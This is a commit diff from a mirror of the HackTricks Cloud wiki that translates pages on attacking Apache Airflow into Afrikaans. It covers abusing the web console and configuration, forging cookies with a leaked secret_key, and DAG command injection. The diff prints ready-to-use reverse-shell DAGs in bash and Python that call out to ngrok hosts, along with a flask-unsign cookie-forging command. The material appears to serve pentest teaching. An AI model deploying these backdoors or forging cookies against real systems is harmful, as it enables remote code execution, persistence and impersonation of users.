gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-31 23:15:48 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:29:08 +00:00
parent 2753c75e8b
commit 396dbafaf2
245 changed files with 9878 additions and 12609 deletions
Download Patch File Download Diff File Expand all files Collapse all files

150
src/pentesting-ci-cd/apache-airflow-security/README.md
View File

@@ -2,22 +2,21 @@
{{#include ../../banners/hacktricks-training.md}}
### Basic Information
### Basiese Inligting
[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
[**Apache Airflow**](https://airflow.apache.org) dien as 'n platform vir **die orkestrering en skedulering van datapipelines of werksvloei**. Die term "orkestrering" in die konteks van datapipelines dui op die proses van die rangskikking, koördinering en bestuur van komplekse dataverkies wat uit verskeie bronne ontstaan. Die primêre doel van hierdie georkestreerde datapipelines is om verwerkte en verbruikbare datastelle te verskaf. Hierdie datastelle word wyd gebruik deur 'n menigte toepassings, insluitend maar nie beperk tot besigheidsintelligensie-instrumente, datawetenskap en masjienleer modelle, wat almal fundamenteel is vir die funksionering van groot data toepassings.
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
Basies sal Apache Airflow jou toelaat om **die uitvoering van kode te skeduleer wanneer iets** (gebeurtenis, cron) **gebeur**.
### Local Lab
### Plaaslike Laboratorium
#### Docker-Compose
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
Jy kan die **docker-compose konfigurasie lêer van** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) gebruik om 'n volledige apache airflow docker omgewing te begin. (As jy op MacOS is, maak seker jy gee ten minste 6GB RAM aan die docker VM).
#### Minikube
One easy way to **run apache airflo**w is to run it **with minikube**:
Een maklike manier om **apache airflow** te **hardloop is om dit met minikube** te hardloop:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
### Airflow Konfigurasie
### Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
Airflow mag **sensitiewe inligting** in sy konfigurasie stoor of jy kan swak konfigurasies in plek vind:
{{#ref}}
airflow-configuration.md
@@ -38,65 +36,62 @@ airflow-configuration.md
### Airflow RBAC
Before start attacking Airflow you should understand **how permissions work**:
Voordat jy begin om Airflow aan te val, moet jy verstaan **hoe toestemmings werk**:
{{#ref}}
airflow-rbac.md
{{#endref}}
### Attacks
### Aanvalle
#### Web Console Enumeration
#### Web Konsolering
If you have **access to the web console** you might be able to access some or all of the following information:
As jy **toegang tot die webkonsol** het, mag jy in staat wees om sommige of al die volgende inligting te bekom:
- **Variables** (Custom sensitive information might be stored here)
- **Connections** (Custom sensitive information might be stored here)
- Access them in `http://<airflow>/connection/list/`
- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
- List **users & roles**
- **Code of each DAG** (which might contain interesting info)
- **Veranderlikes** (Pasgemaakte sensitiewe inligting mag hier gestoor word)
- **Verbindings** (Pasgemaakte sensitiewe inligting mag hier gestoor word)
- Toegang tot hulle in `http://<airflow>/connection/list/`
- [**Konfigurasie**](./#airflow-configuration) (Sensitiewe inligting soos die **`secret_key`** en wagwoorde mag hier gestoor word)
- Lys **gebruikers & rolle**
- **Kode van elke DAG** (wat interessante inligting mag bevat)
#### Retrieve Variables Values
#### Herwin Veranderlikes Waardes
Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
Veranderlikes kan in Airflow gestoor word sodat die **DAGs** hul waardes kan **toegang**. Dit is soortgelyk aan geheime van ander platforms. As jy **genoeg toestemmings** het, kan jy hulle in die GUI in `http://<airflow>/variable/list/` toegang.\
Airflow sal standaard die waarde van die veranderlike in die GUI wys, egter, volgens [**hierdie**](https://marclamberti.com/blog/variables-with-apache-airflow/) is dit moontlik om 'n **lys van veranderlikes** in te stel waarvan die **waarde** as **sterretjies** in die **GUI** sal verskyn.
![](<../../images/image (164).png>)
However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
Egter, hierdie **waardes** kan steeds **herwin** word via **CLI** (jy moet DB toegang hê), **arbitraire DAG** uitvoering, **API** toegang tot die veranderlikes eindpunt (die API moet geaktiveer wees), en **selfs die GUI self!**\
Om toegang tot daardie waardes vanaf die GUI te verkry, kies net die **veranderlikes** wat jy wil toegang en **klik op Aksies -> Eksporteer**.\
'n Ander manier is om 'n **bruteforce** op die **verborge waarde** uit te voer deur die **soekfilter** totdat jy dit kry:
![](<../../images/image (152).png>)
#### Privilege Escalation
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
#### Privilege Escalatie
As die **`expose_config`** konfigurasie op **Waar** gestel is, kan die **rol Gebruiker** en **bo** die **konfig in die web** **lees**. In hierdie konfig, verskyn die **`secret_key`**, wat beteken enige gebruiker met hierdie geldige kan **sy eie onderteken koekie skep om enige ander gebruikersrekening na te boots**.
```bash
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
#### DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
As jy **skrywe toegang** het tot die plek waar die **DAGs gestoor word**, kan jy eenvoudig **een skep** wat vir jou 'n **omgekeerde skulp** sal stuur.\
Let daarop dat hierdie omgekeerde skulp binne 'n **airflow worker container** uitgevoer gaan word:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
```
```python
@@ -105,75 +100,66 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
```
#### DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
As jy iets stel om **uitgevoer te word in die wortel van die kode**, op die oomblik van hierdie skrywe, sal dit **deur die skeduleerder uitgevoer word** na 'n paar sekondes nadat dit binne die DAG se gids geplaas is.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
#### DAG Skepping
#### DAG Creation
As jy daarin slaag om 'n **masjien binne die DAG-kluster te kompromitteer**, kan jy nuwe **DAG-skripte** in die `dags/` gids skep en hulle sal **in die res van die masjiene** binne die DAG-kluster **gekopieer word**.
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
#### DAG Kode Inspuiting
#### DAG Code Injection
Wanneer jy 'n DAG vanaf die GUI uitvoer, kan jy **argumente** aan dit **oorgee**.\
Daarom, as die DAG nie behoorlik gekodeer is nie, kan dit **kwulnerabel wees vir Opdrag Inspuiting.**\
Dit is wat in hierdie CVE gebeur het: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
When you execute a DAG from the GUI you can **pass arguments** to it.\
Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
Alles wat jy moet weet om **te begin soek na opdrag inspuitings in DAGs** is dat **parameters** met die kode **`dag_run.conf.get("param_name")`** **toegang verkry**.
Boonop kan dieselfde kwesbaarheid voorkom met **veranderlikes** (let daarop dat jy met genoeg voorregte die **waarde van die veranderlikes** in die GUI kan **beheer**). Veranderlikes word **toegang verkry met**:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
If they are used for example inside a a bash command, you could perform a command injection.
As hulle byvoorbeeld binne 'n bash-opdrag gebruik word, kan jy 'n opdraginjeksie uitvoer.
{{#include ../../banners/hacktricks-training.md}}

118
src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
View File

@@ -1,115 +1,105 @@
# Airflow Configuration
# Airflow Konfigurasie
{{#include ../../banners/hacktricks-training.md}}
## Configuration File
## Konfigurasie Lêer
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
**Apache Airflow** genereer 'n **konfigurasie lêer** in al die airflow masjiene genaamd **`airflow.cfg`** in die huis van die airflow gebruiker. Hierdie konfigurasie lêer bevat konfigurasie-inligting en **kan interessante en sensitiewe inligting bevat.**
**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
**Daar is twee maniere om toegang tot hierdie lêer te verkry: Deur 'n paar airflow masjiene te kompromitteer, of deur toegang tot die webkonsol.**
Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
Let daarop dat die **waardes binne die konfigurasie lêer** **nie diegene mag wees wat gebruik word nie**, aangesien jy dit kan oorskryf deur omgewingsveranderlikes soos `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` in te stel.
If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
If you have **access to some machine inside the airflow env**, check the **environment**.
As jy toegang het tot die **konfigurasie lêer in die webbediener**, kan jy die **werklike lopende konfigurasie** op dieselfde bladsy waar die konfigurasie vertoon word, nagaan.\
As jy **toegang het tot 'n paar masjiene binne die airflow omgewing**, kyk na die **omgewing**.
Some interesting values to check when reading the config file:
Sommige interessante waardes om na te kyk wanneer jy die konfigurasie lêer lees:
### \[api]
- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- You can also **create you own authentication** method with python.
- **`google_key_path`:** Path to the **GCP service account key**
- **`access_control_allow_headers`**: Dit dui die **toegelate** **koppe** vir **CORS** aan
- **`access_control_allow_methods`**: Dit dui die **toegelate metodes** vir **CORS** aan
- **`access_control_allow_origins`**: Dit dui die **toegelate oorspronge** vir **CORS** aan
- **`auth_backend`**: [**Volgens die dokumentasie**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) kan 'n paar opsies in plek wees om te konfigureer wie toegang tot die API kan hê:
- `airflow.api.auth.backend.deny_all`: **Standaard kan niemand** toegang tot die API hê nie
- `airflow.api.auth.backend.default`: **Enigiemand kan** toegang hê sonder verifikasie
- `airflow.api.auth.backend.kerberos_auth`: Om **kerberos-verifikasie** te konfigureer
- `airflow.api.auth.backend.basic_auth`: Vir **basiese verifikasie**
- `airflow.composer.api.backend.composer_auth`: Gebruik komponiste se verifikasie (GCP) (van [**hier**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: Dit dui die **rol** aan wat die **komponiste gebruiker** binne **airflow** sal kry (**Op** standaard).
- Jy kan ook jou eie **verifikasie** metode met python skep.
- **`google_key_path`:** Pad na die **GCP diensrekening sleutel**
### **\[atlas]**
- **`password`**: Atlas password
- **`username`**: Atlas username
- **`password`**: Atlas wagwoord
- **`username`**: Atlas gebruikersnaam
### \[celery]
- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url which may contain **credentials**.
- **`ssl_cacert`**: Path to the cacert
- **`ssl_cert`**: Path to the cert
- **`ssl_key`**: Path to the key
- **`flower_basic_auth`** : Kredensiale (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url wat **kredensiale** kan bevat.
- **`ssl_cacert`**: Pad na die cacert
- **`ssl_cert`**: Pad na die sertifikaat
- **`ssl_key`**: Pad na die sleutel
### \[core]
- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that dont contain the strings `DAG` and `airflow`.
- **`fernet_key`**: Key to store encrypted variables (symmetric)
- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
- **`security`**: What security module to use (for example kerberos)
- **`dag_discovery_safe_mode`**: Geaktiveer deur standaard. Wanneer DAGs ontdek word, ignoreer enige lêers wat nie die strings `DAG` en `airflow` bevat nie.
- **`fernet_key`**: Sleutel om versleutelde veranderlikes te stoor (simmetries)
- **`hide_sensitive_var_conn_fields`**: Geaktiveer deur standaard, verberg sensitiewe inligting van verbindings.
- **`security`**: Watter sekuriteitsmodule om te gebruik (byvoorbeeld kerberos)
### \[dask]
- **`tls_ca`**: Path to ca
- **`tls_cert`**: Part to the cert
- **`tls_key`**: Part to the tls key
- **`tls_ca`**: Pad na ca
- **`tls_cert`**: Pad na die sertifikaat
- **`tls_key`**: Pad na die tls sleutel
### \[kerberos]
- **`ccache`**: Path to ccache file
- **`forwardable`**: Enabled by default
- **`ccache`**: Pad na ccache lêer
- **`forwardable`**: Geaktiveer deur standaard
### \[logging]
- **`google_key_path`**: Path to GCP JSON creds.
- **`google_key_path`**: Pad na GCP JSON kredensiale.
### \[secrets]
- **`backend`**: Full class name of secrets backend to enable
- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
- **`backend`**: Volledige klasnaam van die secrets backend om te aktiveer
- **`backend_kwargs`**: Die backend_kwargs parameter word in 'n woordeboek gelaai en aan **init** van die secrets backend klas oorgedra.
### \[smtp]
- **`smtp_password`**: SMTP password
- **`smtp_user`**: SMTP user
- **`smtp_password`**: SMTP wagwoord
- **`smtp_user`**: SMTP gebruiker
### \[webserver]
- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
- **`cookie_secure`**: Set **secure flag** on the the session cookie
- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
- **`cookie_samesite`**: Standaard is dit **Lax**, so dit is reeds die swakste moontlike waarde
- **`cookie_secure`**: Stel **veilige vlag** op die sessie koekie
- **`expose_config`**: Standaard is dit Vals, as waar, kan die **konfigurasie** **gelees** word vanaf die web **konsol**
- **`expose_stacktrace`**: Standaard is dit Waar, dit sal **python tracebacks** vertoon (potensieel nuttig vir 'n aanvaller)
- **`secret_key`**: Dit is die **sleutel wat deur flask gebruik word om die koekies te teken** (as jy dit het, kan jy **enige gebruiker in Airflow naboots**)
- **`web_server_ssl_cert`**: **Pad** na die **SSL** **sertifikaat**
- **`web_server_ssl_key`**: **Pad** na die **SSL** **Sleutel**
- **`x_frame_enabled`**: Standaard is **Waar**, so klikjacking is nie moontlik nie
### Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
### Web Verifikasie
Standaard word **web verifikasie** in die lêer **`webserver_config.py`** gespesifiseer en is geconfigureer as
```bash
AUTH_TYPE = AUTH_DB
```
Which means that the **authentication is checked against the database**. However, other configurations are possible like
Wat beteken dat die **authentisering teen die databasis nagegaan word**. egter, ander konfigurasies is moontlik soos
```bash
AUTH_TYPE = AUTH_OAUTH
```
Om die **verifikasie aan derdeparty-dienste** oor te laat.
To leave the **authentication to third party services**.
However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
Daar is egter ook 'n opsie om **anonieme gebruikers toegang** te gee, deur die volgende parameter op die **gewenste rol** in te stel:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
{{#include ../../banners/hacktricks-training.md}}

30
src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
View File

@@ -4,44 +4,40 @@
## RBAC
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow verskaf 'n **stel rolle standaard**: **Admin**, **User**, **Op**, **Viewer**, en **Public**. **Slegs `Admin`** gebruikers kan **die toestemmings vir ander rolle konfigureer/wysig**. Maar dit word nie aanbeveel dat `Admin` gebruikers hierdie standaard rolle op enige manier verander deur toestemmings van hierdie rolle te verwyder of by te voeg nie.
- **`Admin`** users have all possible permissions.
- **`Public`** users (anonymous) dont have any permissions.
- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
- **`Op`** users have `User` permissions plus additional op permissions.
- **`Admin`** gebruikers het alle moontlike toestemmings.
- **`Public`** gebruikers (anoniem) het geen toestemmings nie.
- **`Viewer`** gebruikers het beperkte kyktoestemmings (slegs lees). Dit **kan nie die konfigurasie sien nie.**
- **`User`** gebruikers het `Viewer` toestemmings plus addisionele gebruikers toestemmings wat hom toelaat om DAGs 'n bietjie te bestuur. Hy **kan die konfigurasie lêer sien.**
- **`Op`** gebruikers het `User` toestemmings plus addisionele operasionele toestemmings.
Note that **admin** users can **create more roles** with more **granular permissions**.
Let daarop dat **admin** gebruikers kan **meer rolle skep** met meer **fynere toestemmings**.
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
Neem ook kennis dat die enigste standaard rol met **toestemming om gebruikers en rolle te lys is Admin, nie eens Op** sal dit kan doen nie.
### Default Permissions
These are the default permissions per default role:
Hierdie is die standaard toestemmings per standaard rol:
- **Admin**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op Roles, kan lees op Permissions, kan verwyder op Roles, kan wysig op Roles, kan skep op Roles, kan lees op Users, kan skep op Users, kan wysig op Users, kan verwyder op Users, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs, kan lees op Task Reschedules, menu toegang op Task Reschedules, kan lees op Triggers, menu toegang op Triggers, kan lees op Passwords, kan wysig op Passwords, menu toegang op List Users, menu toegang op Security, menu toegang op List Roles, kan lees op User Stats Chart, menu toegang op User's Statistics, menu toegang op Base Permissions, kan lees op View Menus, menu toegang op Views/Menus, kan lees op Permission Views, menu toegang op Permission on Views/Menus, kan kry op MenuApi, menu toegang op Providers, kan skep op XComs]
- **Op**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs]
- **User**
\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
\[kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances]
- **Viewer**
\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
